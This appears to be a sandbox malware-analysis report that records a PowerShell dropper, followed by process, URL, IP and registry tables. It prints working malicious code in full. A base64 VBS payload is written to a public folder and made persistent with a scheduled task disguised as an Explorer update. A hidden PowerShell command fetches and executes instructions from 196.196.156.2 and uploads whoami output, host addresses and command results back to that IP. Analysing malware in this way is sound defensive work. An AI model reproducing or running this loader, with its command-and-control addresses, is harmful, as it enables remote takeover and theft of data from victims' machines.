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';$fil=[System.Convert]::FromBase64String($temp);set-content
$home\appdata\local\temp\623-6341-11.docx -value $fil -encoding byte;&$home\appdata\local\temp\623-6341-11.docx;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgc3RhcnQtc2xlZXAgMzk7c3RhcnQtc2xlZXAgMTI7c3RhcnQtc2xlZXAgMTE7JGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE5Ni4xOTYuMTU2LjI6NTc4ODEvSGNLT0FoYVpnRGVQS0dLRi9wYWdlMjEzL3VwZ3JhZGUudHh0Jyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGJqZG8rPUlFWCAkamtyfG91dC1zdHJpbmc7W2J5dGVbXV0kZHJweT1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjpVdGY4LkdldEJ5dGVzKCRiamRvKTt9O3N0YXJ0LXNsZWVwIDEwOyR1ams9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50O3N0YXJ0LXNsZWVwIDE2OyR1amsudXBsb2FkZGF0YSgnaHR0cDovLzE5Ni4xOTYuMTU2LjI6NDkyMTAvcGFnZTIxMycsJGRycHkpO30iDQpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content
C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4
/tr C:\Users\Public\Libraries\Libraries.vbs /f;
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 4 /tr C:\Users\Public\Libraries\Libraries.vbs
/f
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
12;start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX
$jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('http://196.196.156.2:49210/page213',$drpy);}
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep
12;start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt');if($flm.Length
-gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX
$jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep
16;$ujk.uploaddata('http://196.196.156.2:49210/page213',$drpy);}
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\623-6341-11.docx"
/o ""
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://196.196.156.2:57881/HcKOA
|
unknown
|
|
|
|
http://196.196.156.2:57881
|
unknown
|
|
|
|
http://196.196.156.2:57881/HcKOAh
|
unknown
|
|
|
|
http://196.196.156.2:49210/page213
|
unknown
|
|
|
|
http://196.196.156.2:57881/HcKOAhaZgDePKGKF/page213/upgrade.txt
|
196.196.156.2
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://login.windows.net
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://196.196.156.2:57881/hckoahazgdepkgkf/page213/upgrade.txt
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
http://196.196.156.2:49210/page213testf8.GetByteses
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://196.196.156.2:57881(
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 16 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
196.196.156.2
|
unknown
|
Seychelles
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
|
0
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6292
|
0
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
|
d <
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Wizards
|
PageSize
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\MailSettings
|
Template
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
|
